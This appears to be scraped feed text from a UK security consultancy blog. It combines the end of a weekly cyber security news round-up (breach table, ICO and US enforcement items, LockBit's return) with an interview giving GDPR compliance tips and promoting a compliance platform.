Source
(New)
ManufacturingUSAYesUnknown
Welch’s
Source
(New)
ManufacturingUSAYesUnknown
C&J Industries
Source
(New)
Professional servicesUSAYesUnknown
Carl Fischer Music Publishing
Source
(New)
RetailUSAYesUnknown
Lancaster
Source
(New)
RetailUSAYesUnknown
U-Haul
Source
(New)
RetailUSAYesUnknown
Andfla
Source
(New)
AgricultureRomaniaUnknownUnknown
CRB Group
Source
(New)
ConstructionUSAUnknownUnknown
KHS&S Contractors
Source
(New)
ConstructionUSAUnknownUnknown
Dunaway
Source
(New)
EngineeringUSAUnknownUnknown
Change Healthcare
Source
(New)
HealthcareUSAUnknownUnknown
Ernest Health
Source
(New)
HealthcareUSAUnknownUnknown
National Dentex Labs
Source
(New)
HealthcareUSAUnknownUnknown
Silgan Holdings
Source
(New)
ManufacturingUSAUnknownUnknown

Note 1: ‘New’/‘Update’ in the first column refers to whether this breach was first publicly disclosed this week, or whether a significant update was released this week. The updated data point is italicised in the table.

Note 2: For incidents where we only know the file size of the data breached, we use the formula 1 MB = 1 record. Given that we can’t know the exact numbers, as it depends on the types of records included (e.g. pictures and medical histories are considerably larger files than just names and addresses), we err on the side of caution by using this formula. We believe that this underestimates the records breached in most cases, but it is more accurate than not providing a number at all.


Enforcement

ICO orders leisure centre to stop using facial recognition technology to monitor staff

The ICO (Information Commissioner’s Office) has ordered Serco Leisure and several associated community leisure trusts to stop using facial recognition technology to monitor employee attendance as this is “neither fair nor proportionate under data protection law”, according to the UK Information Commissioner.

On the same day the ICO issued this enforcement notice, it published new guidance for using biometric data.

New US Executive Order issued to strengthen US port security

The Biden-Harris administration is issuing an Executive Order to strengthen the security of US ports. Cyber incidents that endanger “any vessel, harbor, port, or waterfront facility” must be reported. The US Coast Guard is also given the authority to respond to “malicious cyber activity”.


Other news

LockBit ransomware group recovers from law enforcement disruption

Last week, we reported that law enforcers disrupted the LockBit ransomware group. Four days later, the group recovered. Its blog has now reappeared, as well as a leak page containing folders for “dozens” of victims.

NSA announces retirement of director of cyber security

The US NSA (National Security Agency) has announced the retirement of its director of cyber security, Rob Joyce. He’ll be succeeded by David Luber.


Key date

31 March 2024 – PCI DSS v4.0 transitioning deadline 

Version 3.2.1 of the PCI DSS (Payment Card Industry Data Security Standard) is being retired on 31 March, to be replaced by version 4.0 of the Standard. There are more than 50 new requirements in PCI DSS v4.0. You can find out more about them on the PCI Security Standards Council’s website.


That’s it for this week’s round-up. We hope you found it useful.

We’ll be back next week with the biggest and most interesting news stories, all rounded up in one place.

In the meantime, if you missed it, check out last week’s round-up. Alternatively, you can view our full archive.


Security Spotlight

To get news of the latest data breaches and cyber attacks straight to your inbox, subscribe to our weekly newsletter: the Security Spotlight.

Every Wednesday, you’ll get a 4-minute email with:

  • Industry news, including this weekly round-up;
  • Our latest research and statistics;
  • Interviews with our experts, sharing their insights and expertise;
  • Free useful resources; and
  • Upcoming webinars.

The post The Week in Cyber Security and Data Privacy: 19 – 25 February 2024 appeared first on IT Governance UK Blog.

]]>
Maintaining GDPR and Data Privacy Compliance in 2024 https://www.itgovernance.co.uk/blog/maintaining-gdpr-and-data-privacy-compliance-in-2024 Fri, 16 Feb 2024 10:55:04 +0000 https://www.itgovernance.co.uk/blog/?p=46055 Expert tips from Alan Calder Alan is the Group CEO of GRC International Group PLC, the parent company of IT Governance, and is an acknowledged international security guru. He’s also an award-winning author, and has been involved in developing a wide range of information security and data privacy training courses, has consulted for clients across the globe, and is a regular media commentator and speaker. We sat down to chat to him about industry challenges in 2024. There are still more than ten months to go in 2024. What challenges do you think we’ll see before the year ends? For

The post Maintaining GDPR and Data Privacy Compliance in 2024 appeared first on IT Governance UK Blog.

]]>
Expert tips from Alan Calder

Alan is the Group CEO of GRC International Group PLC, the parent company of IT Governance, and is an acknowledged international security guru.

He’s also an award-winning author, and has been involved in developing a wide range of information security and data privacy training courses, has consulted for clients across the globe, and is a regular media commentator and speaker.

We sat down to chat to him about industry challenges in 2024.


There are still more than ten months to go in 2024. What challenges do you think we’ll see before the year ends?

For a start, maintaining data privacy and GDPR [General Data Protection Regulation] compliance will become increasingly complex through 2024, particularly for organisations operating across multiple jurisdictions.

GDPR enforcement within the EU, combined with the EU-US data privacy framework and the planned changes to the UK GDPR, all bring challenges in terms of keeping on top of what must be done.

In addition, 14 US states now have their own data privacy laws, and GDPR-like legislation has proliferated across the world.

The volume of cyber security and cyber resilience legislation is also surging, alongside these privacy laws, which have additional – and significant – implications for how organisations address their data privacy obligations.

About that “GDPR-like legislation”, could you please elaborate?

The GDPR is acknowledged around the world as a ‘gold standard’ when it comes to data privacy legislation, affording personal data a level of protection largely unmatched elsewhere – certainly in 2016, when the GDPR was first published in its final form.

Since then, we’ve seen many more laws like it emerge, including California’s CPRA [California Privacy Rights Act], Brazil’s LGPD [General Personal Data Protection Law] and Japan’s APPI [Act on the Protection of Personal Information].

This isn’t too surprising, considering the high standard set by the EU GDPR, paired with the fact that the Regulation itself applies beyond the EEA:

  • To personal data processing carried out on behalf of data controllers or processors in the EU;
  • To the processing of EU residents’ personal data in relation to offering them goods or services, or in relation to monitoring their behaviour; and
  • Where EU member state law applies by virtue of public international law.

What are your top tips for ensuring compliance with the GDPR and similar laws?

Management in all organisations should consider the following five points:

  1. Review your privacy notice – ensure that it’s up to date and reflects the jurisdictions you’re processing personal data in. If you’re transparent about what you’re doing with people’s data, you’re less likely to be challenged about your overall compliance and compliance strategy.
  2. Check your marketing opt-out mechanisms – ensure that these all work as they should and that, internally, you’re clear about the lawful grounds on which you contact people. If you’re careful about compliance in your marketing activities, you’re less likely to trigger a complaint that might lead to a fuller investigation. Even that aside, the ICO [Information Commissioner’s Office] has been strict on its PECR [Privacy and Electronic Communications Regulations] enforcement, certainly where unsolicited marketing is concerned.
  3. Map your data flows – make sure you know 1) what data is going where, including subcontractors, service providers and supporting software systems; 2) who has access to that data; and 3) how it is protected. This ensures you can identify relevant legal obligations, as well as assess and improve data security measures.
  4. Review your data protection measures – make sure they’re up to the task: Cyber Essentials and anti-phishing training are simple measures that go a long way towards keeping you out of trouble. Penetration testing is also well worth the investment.
  5. Look for a compliance platform that enables you to cost-effectively cross-map the various regulatory requirements, identify relevant controls, and generate the necessary policies, procedures and other documentation.

This combination of activities should be enough to keep organisations out of trouble. After all, if you don’t give data subjects grounds to complain, and you avoid a security breach, you’re unlikely to find yourself managing the consequences of breaching the GDPR.


CyberComply

This Cloud-based, end-to-end solution simplifies compliance with a range of data privacy and cyber security laws and standards, including the GDPR:

  • Manage all your cyber security and data privacy obligations in one place.
  • Get immediate visibility of critical data and key performance indicators.
  • Stay ahead of regulatory changes with our scalable compliance solution.
  • Reduce errors and improve the completeness of your risk management processes.
  • Identify and treat privacy and security risks before they become critical concerns.

To find out more about this platform, read our interview with Sam McNicholls-Novoa, the product marketing manager for CyberComply, or try it yourself with our free 30-day trial.


We hope you enjoyed this week’s edition of our ‘Expert Insight’ series. We’ll be back next week, chatting to another expert within the Group.

In the meantime, if you missed it, check out last week’s blog, where senior penetration tester Leon Teale gave us his expert insights into the CVSS (Common Vulnerability Scoring System).


The post Maintaining GDPR and Data Privacy Compliance in 2024 appeared first on IT Governance UK Blog.

]]>